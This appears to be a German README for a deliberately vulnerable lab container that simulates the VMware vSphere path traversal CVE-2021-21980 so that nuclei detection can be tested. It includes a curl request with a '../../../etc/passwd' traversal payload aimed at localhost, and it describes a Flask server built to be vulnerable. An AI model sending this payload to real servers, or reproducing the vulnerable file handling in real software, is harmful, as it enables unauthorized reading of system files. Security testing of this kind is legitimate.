
Realistisches verwundbares Labor für CVE-2021-21980 (VMware vSphere Pfad-Traversal) - Tatsächliche Dateiausnutzung, kein Mock-Server
Realistische Testumgebung zur Simulation der Path-Traversal-Schwachstelle im VMware vSphere Web Client.
⚠️ WARNUNG: Verwundbare Testumgebung. Nicht dem Internet aussetzen!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ Liest tatsächlich Dateien aus dem Container-Dateisystem mittels Python-Datei-I/O
✅ Realistisches Verhalten – Behandelt Path Traversal wie echtes vSphere
✅ VMware-Header – Enthält Server: VMware-HTTP-Server/1.0
✅ SSL/TLS – Selbstsignierte Zertifikatserstellung
✅ Nicht fest codiert – Gibt tatsächliche Dateiinhalte zurück
Dockerfile – Konfiguration zum Erstellen des Containersserver.py – Verwundbare Flask-AnwendungCVE-2021-21980.yaml – Nuclei-ErkennungsvorlageREADME.md – Diese DateiDieses Labor wurde mit Nuclei validiert und zeigte:
podman stop vcenter-lab && podman rm vcenter-lab